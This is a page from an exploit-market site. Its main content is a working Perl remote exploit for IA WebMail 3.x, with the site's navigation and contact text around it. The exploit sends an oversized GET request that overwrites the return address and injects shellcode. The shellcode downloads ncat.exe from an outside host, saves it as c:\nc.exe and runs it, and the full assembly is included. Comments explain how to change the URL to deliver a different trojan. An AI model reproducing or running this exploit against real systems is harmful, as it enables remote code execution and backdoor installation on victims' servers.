[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 583    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit

Author
Peter Winter-Smith
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-8362
Category
remote exploits
Date add
19-11-2003
Platform
unsorted
============================================================
IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
============================================================

#!/usr/bin/perl -w
#
# IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
# Application Specific Shellcode: URL Downloader
#  - www elitehaven net/ncat.exe (downloaded)
#  - c:\nc.exe                          (created)
#
# By Peter Winter-Smith peter4020 hotmail com
# Shellcode included - will need reassembling to use different
# urls and files etc.
#
# Tested against:
#  - Windows XP Home SP1
#  - Windows 2000 Pro SP4
#
# Shellcode should work each time, since it steals it's addresses
# from the iaregdll.dll module import tables.
# Uses a very static jmp esp in iaregdll.dll - Should work on all
# servers without alteration!
#
# If the remote server is running a firewall, the urldownloader
# will be unable to spawn a shell, so for testing I recommend
# that you close the firewalls, or get another shellcode which
# will deal with this. This exploit is for PoC purposes only :o)
#
# Notes:
#  - WebMailsvr.exe exits without consuming 100% resources in most
#    cases.
#  - This has only been tested with IA WebMail 3.1, however it was
#    designed to exploit all versions.



use IO::Socket;

if(!($ARGV[1]))
{
 print "Usage: iawebmail.pl <victim> <port>\n\n";
 exit;
}

$shellcode =            "\x90\xEB\x3C\x5F\x55\x89\xE5\x81" .
                        "\xC4\xE8\xFF\xFF\xFF\x57\x31\xDB" .
                        "\xB3\x07\xB0\xFF\xFC\xF2\xAE\xFE" .
                        "\x47\xFF\xFE\xCB\x80\xFB\x01\x75" .
                        "\xF4\x5F\x57\x8D\x7F\x0B\x57\x8D" .
                        "\x7F\x13\x57\x8D\x7F\x08\x57\x8D" .
                        "\x7F\x23\x57\x8D\x7F\x09\x47\x57" .
                        "\x8D\x54\x24\x14\x52\xEB\x02\xEB" .
                        "\x52\x89\xD6\xFF\x36\xFF\x15\xDC" .
                        "\x51\x02\x10\x5A\x52\x8D\x72\xFC" .
                        "\xFF\x36\x50\xFF\x15\x14\x52\x02" .
                        "\x10\x5A\x52\x31\xC9\x51\x51\x8D" .
                        "\x72\xF0\xFF\x36\x8D\x72\xF4\xFF" .
                        "\x36\x51\xFF\xD0\x5A\x52\xFF\x72" .
                        "\xEC\xFF\x15\xDC\x51\x02\x10\x5A" .
                        "\x52\x8D\x72\xF8\xFF\x36\x50\xFF" .
                        "\x15\x14\x52\x02\x10\x5A\x52\x31" .
                        "\xC9\x41\x51\x8D\x72\xF0\xFF\x36" .
                        "\xFF\xD0\xCC\xE8\x6B\xFF\xFF\xFF" .
                        "\x55\x52\x4C\x4D\x4F\x4E\x2E\x44" .
                        "\x4C\x4C\xFF\x55\x52\x4C\x44\x6F" .
                        "\x77\x6E\x6C\x6F\x61\x64\x54\x6F" .
                        "\x46\x69\x6C\x65\x41\xFF\x57\x69" .
                        "\x6E\x45\x78\x65\x63\xFF\x68\x74" .
                        "\x74\x70\x3A\x2F\x2F\x77\x77\x77" .
                        "\x2E\x65\x6C\x69\x74\x65\x68\x61" .
                        "\x76\x65\x6E\x2E\x6E\x65\x74\x2F" .
                        "\x6E\x63\x61\x74\x2E\x65\x78\x65" .
                        "\xFF\x63\x3A\x5C\x6E\x63\x2E\x65" .
                        "\x78\x65\xFF\x6B\x65\x72\x6E\x65" .
                        "\x6C\x33\x32\x2E\x64\x6C\x6C\xFF";

$victim = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
                            or die "Unable to connect to $ARGV[0] on port $ARGV[1]";
$ebp = "BBBB";
$eip = "\x33\xBD\x02\x10";
$exploit = "GET /" . "a"x1036 . $ebp . $eip . $shellcode . " HTTP/1.1\n\n";

print $victim $exploit;

print " + Malicious GET request sent ...\n";
print " + Wait a moment now, then connect to $ARGV[0] on port 9999.\n";

sleep(5);

print "Done.\n";

close($victim);
exit;

########################################
##                            SHELLCODE                              #
########################################
# ; IA WebMail 3.x Shellcode (iaregdll.dll version 1.0.0.5)
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; [peter4020@hotmail.com]
# ;
# ; nasmw -fbin -o iashellcode.s iashellcode.asm
#
# bits 32
# 
# int3
# jmp short killnull
# 
# next:
# pop edi
# 
# push ebp
# mov ebp, esp
# add esp, -24
# 
# push edi
# 
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
# 
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
# 
# pop edi
# 
# push edi		; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi		; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi		; 'WinExec'
# lea edi, [edi+08]
# push edi		; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi		; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi		; 'kernel32.dll'
# 
# lea edx, [esp+20]
# push edx
# 
# jmp short over
# killnull:
# jmp short data
# over:
# 
# mov esi, edx
# push dword [esi]
# 
# call [100251DCh]	; LoadLibraryA
# 
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
# 
# push eax
# 
# call [10025214h]	; GetProcAddress(URLMON.DLL, URLDownloadToFileA);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16]	; file path
# push dword [esi]
# lea esi, [edx-12]	; url
# push dword [esi]
# push ecx
# 
# call eax
# 
# pop edx
# push edx
# 
# push dword [edx-20]
# 
# call [100251DCh]	; LoadLibraryA
# 
# pop edx
# push edx
# 
# 
# lea esi, [edx-08]
# push dword [esi]	; 'WinExec'
# push eax		; kernel32.dll handle
# 
# call [10025214h]	; GetProcAddress(kernel32.dll, WinExec);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# inc ecx
# push ecx
# 
# lea esi, [edx-16]	; file path
# push dword [esi]
# 
# call eax
# 
# int3
# 
# 
# data:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ;   db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ;   push edi		; 'http://www.elitehaven.net/ncat.exe'
# ;   lea edi, [edi+35]
# ; and make it:
# ;   push edi		; 'http://www.site.com/someguy/trojan.exe'
# ;   lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
#####################################################################

 

#  0day.today [2024-11-15]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team